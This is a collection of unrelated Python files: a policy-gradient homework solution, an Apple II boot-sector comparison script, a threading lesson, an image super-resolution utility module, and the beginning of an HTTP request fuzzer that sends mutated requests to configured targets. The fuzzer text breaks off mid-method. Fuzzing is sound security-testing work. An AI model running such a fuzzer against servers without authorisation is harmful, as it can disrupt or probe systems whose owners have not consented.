Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
if self.discrete:
sy_logits_na = build_mlp(sy_ob_no, self.ac_dim , "policy", self.n_layers, self.size)
return sy_logits_na
else:
sy_mean = build_mlp(sy_ob_no, self.ac_dim , "policy", self.n_layers, self.size)
sy_logstd = tf.Variable(np.random.rand(self.ac_dim), trainable=True, dtype=tf.float32, name="logstd")
return (sy_mean, sy_logstd)
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
dist = tf.distributions.Categorical(logits=sy_logits_na)
sy_sampled_ac = dist.sample()
else:
sy_mean, sy_logstd = policy_parameters
sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(tf.shape(sy_mean))
return sy_sampled_ac
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
sy_logits_na = policy_parameters
dist = tf.distributions.Categorical(logits=sy_logits_na)
sy_logprob_n = dist.log_prob(sy_ac_na)
else:
sy_mean, sy_logstd = policy_parameters
distribution = tf.contrib.distributions.MultivariateNormalDiag(loc=sy_mean, scale_diag=tf.exp(sy_logstd))
sy_logprob_n = distribution.log_prob(sy_ac_na)
return sy_logprob_n
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
                _no - this tensor should have shape (batch size /n/, observation dim)
                _na - this tensor should have shape (batch size /n/, action dim)
                _n  - this tensor should have shape (batch size /n/)
            Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
                is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
#========================================================================================#
# ----------PROBLEM 2----------
# Loss Function and Training Operation
#========================================================================================#
loss = -tf.reduce_mean(tf.multiply(self.sy_logprob_n, self.sy_adv_n))
self.update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(loss)
#========================================================================================#
# ----------PROBLEM 6----------
# Optional Baseline
#
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
#========================================================================================#
if self.nn_baseline:
self.baseline_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_baseline",
n_layers=self.n_layers,
size=self.size))
self.sy_target_n = tf.placeholder(dtype=tf.float32, shape=[None,], name="targetQ")
baseline_loss = tf.losses.mean_squared_error(self.sy_target_n, self.baseline_prediction)
self.baseline_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(baseline_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards = [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
ac = self.sess.run(self.sy_sampled_ac, feed_dict={
self.sy_ob_no : [ob]
})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > self.max_path_length:
break
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32)}
return path
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
def sum_of_rewards(self, re_n):
"""
Monte Carlo estimation of the Q function.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
----------------------------------------------------------------------------------
Your code should construct numpy arrays for Q-values which will be used to compute
advantages (which will in turn be fed to the placeholder you defined in
Agent.define_placeholders).
Recall that the expression for the policy gradient PG is
PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
where
tau=(s_0, a_0, ...) is a trajectory,
Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
and b_t is a baseline which may depend on s_t.
You will write code for two cases, controlled by the flag 'reward_to_go':
Case 1: trajectory-based PG
(reward_to_go = False)
Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
entire trajectory (regardless of which time step the Q-value should be for).
For this case, the policy gradient estimator is
E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
where
Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
Thus, you should compute
Q_t = Ret(tau)
Case 2: reward-to-go PG
(reward_to_go = True)
Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
from time step t. Thus, you should compute
Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
like the 'ob_no' and 'ac_na' above.
"""
q_n = []
if self.reward_to_go:
for i in range(len(re_n)):
for j in range(len(re_n[i])):
rewardToGo = 0
for k in range(j, len(re_n[i])):
rewardToGo += (self.gamma ** (k - j)) * re_n[i][k]
q_n.append(rewardToGo)
else:
for i in range(len(re_n)):
episodeTotalReward = 0
for j in range(len(re_n[i])):
episodeTotalReward += (self.gamma ** j) * re_n[i][j]
for j in range(len(re_n[i])):
q_n.append(episodeTotalReward)
return q_n
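    # Note: the reward-to-go loops above are O(T^2) per path; the same quantity obeys the
    # backward recursion Q_t = r_t + gamma * Q_{t+1}, which gives an O(T) pass (see the
    # standalone numpy sketch after this class).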
def compute_advantage(self, ob_no, q_n):
"""
Computes advantages by (possibly) subtracting a baseline from the estimated Q values
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Computing Baselines
#====================================================================================#
if self.nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current batch of Q-values. (Goes with Hint
# #bl2 in Agent.update_parameters.
b_n = self.sess.run(self.baseline_prediction, feed_dict={
self.sy_ob_no : ob_no
})
b_n = normalize(b_n, np.mean(q_n), np.std(q_n))
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
return adv_n
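    # The normalize() helper comes from the surrounding homework starter code and is not shown
    # in this file; it is assumed to shift and scale its input to a target mean/std (zero mean,
    # unit std by default). Hint #bl1 above therefore rescales the baseline predictions to the
    # statistics of the current Q-values, matching Hint #bl2 in Agent.update_parameters, where
    # the baseline is fitted to mean-zero/unit-std targets.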
def estimate_return(self, ob_no, re_n):
"""
Estimates the returns over a set of trajectories.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
q_n = self.sum_of_rewards(re_n)
adv_n = self.compute_advantage(ob_no, q_n)
#====================================================================================#
# ----------PROBLEM 3----------
# Advantage Normalization
#====================================================================================#
if self.normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
adv_n = normalize(adv_n)
return q_n, adv_n
def update_parameters(self, ob_no, ac_na, q_n, adv_n):
"""
Update the parameters of the policy and (possibly) the neural network baseline,
which is trained to approximate the value function.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Optimizing Neural Network Baseline
#====================================================================================#
if self.nn_baseline:
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 in
# Agent.compute_advantage.)
target_n = normalize(q_n)
self.sess.run(self.baseline_update_op, feed_dict={
self.sy_ob_no : ob_no,
self.sy_target_n : target_n
})
#====================================================================================#
# ----------PROBLEM 3----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
self.sess.run(self.update_op, feed_dict={
self.sy_ob_no : ob_no,
self.sy_ac_na : ac_na,
self.sy_adv_n : adv_n
})
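# A minimal, self-contained numpy sketch of the two return estimators described in
# Agent.sum_of_rewards (reward-to-go vs. full-trajectory return). It is not wired into Agent;
# the helper name is illustrative only and `np` is assumed to be numpy as imported at the top
# of this file.
def _discounted_returns_sketch(rewards, gamma, reward_to_go):
    rewards = np.asarray(rewards, dtype=np.float64)
    if reward_to_go:
        # Q_t = r_t + gamma * Q_{t+1}, computed with a single backward pass
        q = np.zeros_like(rewards)
        running = 0.0
        for t in reversed(range(len(rewards))):
            running = rewards[t] + gamma * running
            q[t] = running
        return q
    # Trajectory-based estimator: every timestep receives the full discounted return Ret(tau)
    ret = float(np.sum(rewards * (gamma ** np.arange(len(rewards)))))
    return np.full_like(rewards, ret)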
def train_PG(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
reward_to_go,
animate,
logdir,
normalize_advantages,
nn_baseline,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
    # Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_return_args = {
'gamma': gamma,
'reward_to_go': reward_to_go,
'nn_baseline': nn_baseline,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args)
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = [path["reward"] for path in paths]
q_n, adv_n = agent.estimate_return(ob_no, re_n)
agent.update_parameters(ob_no, ac_na, q_n, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=64)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
boot1_levenshtein.py
|
import bitstring
import datetime
import heapq
import multiprocessing
import pylev
import sqlite3
DB_PATH = '/tank/apple2/data/apple2.db'
WORKERS = 2
def main():
conn = sqlite3.connect(DB_PATH)
cursor = conn.cursor()
q = cursor.execute(
"""
select boot1_sha1, boot1.data, count(*) as c from disks
join
(select sha1, data from boot1) as boot1
on disks.boot1_sha1 = boot1.sha1 group by 1;
"""
)
hashes = []
sectors = {}
for r in q:
(hash, sector, count) = r
sectors[hash] = bitstring.BitString(bytes=sector).bin
hashes.append((count, intern(str(hash))))
hashes.sort()
num_items = len(hashes) * (len(hashes) + 1) / 2
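    # num_items counts unordered pairs including self-pairs, n*(n+1)/2; it is not used below.
    # The work heap built next holds the n*(n-1)/2 distinct pairs, ordered so that the most
    # common boot-sector combinations are compared first (score = cnt1*cnt2).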
workitems = []
for idx, data1 in enumerate(hashes):
(cnt1, hash1) = data1
for data2 in hashes[idx+1:]:
(cnt2, hash2) = data2
score = cnt1*cnt2
heapq.heappush(workitems, (-score, hash1, hash2))
num_workitems = len(workitems)
queue = multiprocessing.JoinableQueue()
results = multiprocessing.Queue()
workers = []
for _ in xrange(WORKERS):
worker = multiprocessing.Process(target=levenshtein_worker, args=(queue, results))
        worker.daemon = True  # workers never receive a shutdown sentinel; daemonize them so the script can exit
        worker.start()
workers.append(worker)
print "Workers started"
q = cursor.execute(
"""
select source, target from boot1distances
"""
)
existing = set((intern(str(s)), intern(str(t))) for (s, t) in q)
print "Found %d existing entries" % len(existing)
items_put = 0
while True:
try:
(score, hash1, hash2) = heapq.heappop(workitems)
except IndexError:
break
if (hash1, hash2) in existing and (hash2, hash1) in existing:
continue
items_put += 1
sector1 = sectors[hash1]
sector2 = sectors[hash2]
queue.put_nowait((hash1, hash2, sector1, sector2, score))
del existing
print "%d items put" % items_put
queue.close()
start_time = datetime.datetime.now()
num_results = 0
batch = []
while True:
result = results.get()
num_results += 1
(hash1, hash2, distance, score) = result
batch.append(result)
if num_results % 100 == 0 or num_results == items_put:
# Insert results into DB
cursor.executemany(
"""INSERT OR REPLACE INTO Boot1Distances (source, target, distance) VALUES (?, ?, ?)""",
[(hash1, hash2, distance) for (hash1, hash2, distance, score) in batch]
)
# Inverse pairing
cursor.executemany(
"""INSERT OR REPLACE INTO Boot1Distances (source, target, distance) VALUES (?, ?, ?)""",
[(hash2, hash1, distance) for (hash1, hash2, distance, score) in batch]
)
conn.commit()
if num_results == items_put:
break
now = datetime.datetime.now()
eta = datetime.timedelta(
seconds=(now - start_time).total_seconds() * items_put / num_results) + start_time
print "%d/%d results = %f%% (Score: %d, ETA: %s)" % (
num_results, items_put, float(100*num_results)/items_put, score, eta)
batch = []
print "Done"
conn.close()
def levenshtein_worker(queue, results):
while True:
work = queue.get()
(hash1, hash2, sector1, sector2, score) = work
distance = pylev.levenshtein(sector1, sector2)
results.put_nowait((hash1, hash2, distance, score))
queue.task_done()
if __name__ == "__main__":
main()
|
Lesson12.py
|
# coding:utf-8
'''
date:2017-11-08
Functions, modules and packages, object orientation and design patterns, exception handling, regular expressions, system scripts
'''
# import subprocess
# subprocess.check_output(r'dir')
import os
os.system(r'dir')
import time, threading
def doWork():
name = threading.currentThread().getName()
print "%s start..." % name
time.sleep(3)
print "%s stop..." % name
print time.time()
aThread = threading.Thread(target=doWork, name="aThread")
aThread.start()
bThread = threading.Thread(target=doWork, name="bThread")
bThread.start()
aThread.join()
bThread.join()
print time.time()
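# Both worker threads sleep concurrently (time.sleep releases the GIL), so the whole script
# finishes in roughly 3 seconds rather than 6.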
print '我们'  # prints the Chinese word for "we" to demonstrate UTF-8 output
|
utility.py
|
import datetime
import math
import os
import time
from multiprocessing import Process
from multiprocessing import Queue
import imageio
import matplotlib
matplotlib.use("Agg")  # select the non-interactive backend before pyplot is imported
import matplotlib.pyplot as plt
import numpy as np
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
class timer:
def __init__(self):
self.acc = 0
self.tic()
def tic(self):
self.t0 = time.time()
def toc(self, restart=False):
diff = time.time() - self.t0
if restart:
self.t0 = time.time()
return diff
def hold(self):
self.acc += self.toc()
def release(self):
ret = self.acc
self.acc = 0
return ret
def reset(self):
self.acc = 0
class checkpoint:
def __init__(self, args):
self.args = args
self.ok = True
self.log = torch.Tensor()
now = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
if not args.load:
if not args.save:
args.save = now
self.dir = os.path.join("..", "experiment", args.save)
else:
self.dir = os.path.join("..", "experiment", args.load)
if os.path.exists(self.dir):
self.log = torch.load(self.get_path("psnr_log.pt"))
print("Continue from epoch {}...".format(len(self.log)))
else:
args.load = ""
if args.reset:
os.system("rm -rf " + self.dir)
args.load = ""
os.makedirs(self.dir, exist_ok=True)
os.makedirs(self.get_path("model"), exist_ok=True)
for d in args.data_test:
os.makedirs(self.get_path("results-{}".format(d)), exist_ok=True)
open_type = "a" if os.path.exists(self.get_path("log.txt")) else "w"
self.log_file = open(self.get_path("log.txt"), open_type)
with open(self.get_path("config.txt"), open_type) as f:
f.write(now + "\n\n")
for arg in vars(args):
f.write("{}: {}\n".format(arg, getattr(args, arg)))
f.write("\n")
self.n_processes = 8
def get_path(self, *subdir):
return os.path.join(self.dir, *subdir)
def save(self, trainer, epoch, is_best=False):
trainer.model.save(self.get_path("model"), epoch, is_best=is_best)
trainer.loss.save(self.dir)
trainer.loss.plot_loss(self.dir, epoch)
self.plot_psnr(epoch)
trainer.optimizer.save(self.dir)
torch.save(self.log, self.get_path('psnr_log.pt'))
def add_log(self, log):
self.log = torch.cat([self.log, log])
def write_log(self, log, refresh=False):
print(log)
self.log_file.write(log + "\n")
if refresh:
self.log_file.close()
self.log_file = open(self.get_path("log.txt"), "a")
def done(self):
self.log_file.close()
def plot_psnr(self, epoch):
axis = np.linspace(1, epoch, epoch)
for idx_data, d in enumerate(self.args.data_test):
label = "SR on {}".format(d)
fig = plt.figure()
plt.title(label)
for idx_scale, scale in enumerate(self.args.scale):
plt.plot(
axis,
self.log[:, idx_data, idx_scale].numpy(),
label="Scale {}".format(scale),
)
plt.legend()
plt.xlabel("Epochs")
plt.ylabel("PSNR")
plt.grid(True)
plt.savefig(self.get_path("test_{}.pdf".format(d)))
plt.close(fig)
def begin_background(self):
self.queue = Queue()
def bg_target(queue):
while True:
if not queue.empty():
filename, tensor = queue.get()
if filename is None:
break
imageio.imwrite(filename, tensor.numpy())
self.process = [
Process(target=bg_target, args=(self.queue,))
for _ in range(self.n_processes)
]
for p in self.process:
p.start()
def end_background(self):
for _ in range(self.n_processes):
self.queue.put((None, None))
while not self.queue.empty():
time.sleep(1)
for p in self.process:
p.join()
def save_results(self, dataset, filename, save_list, scale):
if self.args.save_results:
filename = self.get_path(
"results-{}".format(dataset.dataset.name),
"{}_x{}_".format(filename, scale),
)
postfix = ("SR", "LR", "HR")
for v, p in zip(save_list, postfix):
normalized = v[0].mul(255 / self.args.rgb_range)
tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
self.queue.put(("{}{}.png".format(filename, p), tensor_cpu))
def quantize(img, rgb_range):
pixel_range = 255 / rgb_range
return img.mul(pixel_range).clamp(0, 255).round().div(pixel_range)
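# PSNR note: calc_psnr below rescales the error by rgb_range so the peak signal value is 1,
# hence PSNR = 10*log10(1/MSE) = -10*log10(MSE). On benchmark datasets the RGB error is first
# projected to luma with the BT.601 weights (65.738, 129.057, 25.064)/256 and a border of
# `scale` pixels is shaved; otherwise a border of scale + 6 pixels is shaved.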
def calc_psnr(sr, hr, scale, rgb_range, dataset=None):
if hr.nelement() == 1:
return 0
diff = (sr - hr) / rgb_range
if dataset and dataset.dataset.benchmark:
shave = scale
if diff.size(1) > 1:
gray_coeffs = [65.738, 129.057, 25.064]
convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
diff = diff.mul(convert).sum(dim=1)
else:
shave = scale + 6
valid = diff[..., shave:-shave, shave:-shave]
mse = valid.pow(2).mean()
return -10 * math.log10(mse)
def make_optimizer(args, target):
'''
make optimizer and scheduler together
'''
# optimizer
trainable = filter(lambda x: x.requires_grad, target.parameters())
kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
if args.optimizer == 'SGD':
optimizer_class = optim.SGD
kwargs_optimizer['momentum'] = args.momentum
elif args.optimizer == 'ADAM':
optimizer_class = optim.Adam
kwargs_optimizer['betas'] = args.betas
kwargs_optimizer['eps'] = args.epsilon
elif args.optimizer == 'RMSprop':
optimizer_class = optim.RMSprop
kwargs_optimizer['eps'] = args.epsilon
# scheduler
milestones = list(map(lambda x: int(x), args.decay.split('-')))
kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
scheduler_class = lrs.MultiStepLR
class CustomOptimizer(optimizer_class):
def __init__(self, *args, **kwargs):
super(CustomOptimizer, self).__init__(*args, **kwargs)
def _register_scheduler(self, scheduler_class, **kwargs):
self.scheduler = scheduler_class(self, **kwargs)
def save(self, save_dir):
torch.save(self.state_dict(), self.get_dir(save_dir))
def load(self, load_dir, epoch=1):
self.load_state_dict(torch.load(self.get_dir(load_dir)))
if epoch > 1:
for _ in range(epoch): self.scheduler.step()
def get_dir(self, dir_path):
return os.path.join(dir_path, 'optimizer.pt')
def schedule(self):
self.scheduler.step()
def get_lr(self):
return self.scheduler.get_lr()[0]
def get_last_epoch(self):
return self.scheduler.last_epoch
optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
return optimizer
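# Typical usage, as a sketch (assumes an argparse namespace exposing lr, weight_decay,
# optimizer, momentum/betas/epsilon, decay and gamma, as parsed elsewhere in this project;
# train_one_epoch is a placeholder for the actual training step):
#     optimizer = make_optimizer(args, model)
#     for epoch in range(epochs):
#         train_one_epoch(model, loader, optimizer)
#         optimizer.schedule()           # advances the MultiStepLR scheduler
#     optimizer.save(checkpoint_dir)     # writes optimizer.pt via get_dir()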
|
main.py
|
import random
import re
import copy
import socket
import threading
from multiprocessing import Process, Queue
import time
from input_tree_node import Node
from input_tree import InputTree
from input_tree_mutator import Mutator
from helper_functions import _print_exception, _parse_args
class Fuzzer:
def __init__(self, verbose, seed, outfilename, seedfile):
self.read_config(args.config)
self.verbose = verbose
self.seed = seed
self.lock = threading.Lock()
self.outfilename = outfilename
self.seedfile = seedfile
def read_config(self, configfile):
config_content = open(configfile).read().replace('config.', 'self.')
exec(config_content)
if False in [item in self.__dict__ for item in ["target_urls", "target_host_headers", "grammar", "min_num_mutations", "max_num_mutations", "symbol_mutation_types"]]:
print("Please make sure that the configuration is complete.")
exit()
self.target_hosts = {self.target_urls[i]:self.target_host_headers[i] for i in range(len(self.target_urls))}
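    # read_config() exec()s the configuration file with every "config." prefix rewritten to
    # "self.", so the config must also define char_pool (used by run()/run_individual below)
    # even though it is not part of the completeness check above.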
def send_fuzzy_data(self, inputdata, list_responses):
try:
request = inputdata.tree_to_request()
_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_socket.connect((inputdata.host, int(inputdata.port)))
_socket.sendall(request)
_socket.settimeout(4)
response = b''
while True:
data = _socket.recv(2048)
if not data:
break
else:
response += data
_socket.shutdown(socket.SHUT_RDWR)
_socket.close()
with self.lock:
list_responses.append(response)
except socket.timeout:
with self.lock:
list_responses.append(b"takes too long")
except Exception as exception:
_print_exception([request])
raise exception
def get_responses(self, seed, request):
threads = []
list_responses = []
for target_url in self.target_urls:
request.seed = seed
request.url = target_url
request.host_header = self.target_hosts[target_url]
request_copy = copy.deepcopy(request)
thread = threading.Thread(target=self.send_fuzzy_data, args=(request_copy, list_responses))
threads.append(thread)
thread.start()
for thread in threads:
thread.join(5)
return list_responses
def blackbox_fuzz_parallel_batch(self):
for j in range(1): # number of batches
num_procs = 64
batch_size = 1000
            seeds_splitted = [[j * batch_size + s for s in range(proc_idx, batch_size, num_procs)] for proc_idx in range(num_procs)]
quot = Queue()
processes = [Process(target=self.run, args=(seeds_splitted[i], quot)) for i in range(num_procs)]
responses_list = []
for i, proc in enumerate(processes):
proc.start()
result = [quot.get() for p in processes]
for i, proc in enumerate(processes):
proc.join()
responses_list = [ent for sublist in result for ent in sublist]
with open("batch{}.out".format(j), 'w') as outfile:
outfile.write("\n".join(responses_list))
outfile.write("\n")
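    # The results queue is drained with get() *before* the processes are join()ed: joining a
    # child that still has buffered items in a multiprocessing.Queue can deadlock, so this
    # ordering is deliberate.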
def blackbox_fuzz_individual(self, filename=None, seeds=[None]):
if seeds == [None]:
with open(filename, 'r') as _file:
seeds = [int(line.strip()) for line in _file.readlines()]
num_procs = 64
        seeds_splitted = [[seeds[s] for s in range(proc_idx, len(seeds), num_procs)] for proc_idx in range(num_procs)]
quot = Queue()
processes = [Process(target=self.run_individual, args=(seeds_splitted[i], quot)) for i in range(num_procs)]
responses_list = []
for i, proc in enumerate(processes):
proc.start()
result = [quot.get() for p in processes]
for i, proc in enumerate(processes):
proc.join()
responses_list = [ent for sublist in result for ent in sublist]
if self.outfilename is None:
print("\n".join(responses_list))
print("\n")
else:
with open(self.outfilename, 'w') as outfile:
outfile.write("\n".join(responses_list))
outfile.write("\n")
def run(self, seeds, _queue):
responses_list = []
for seed in seeds:
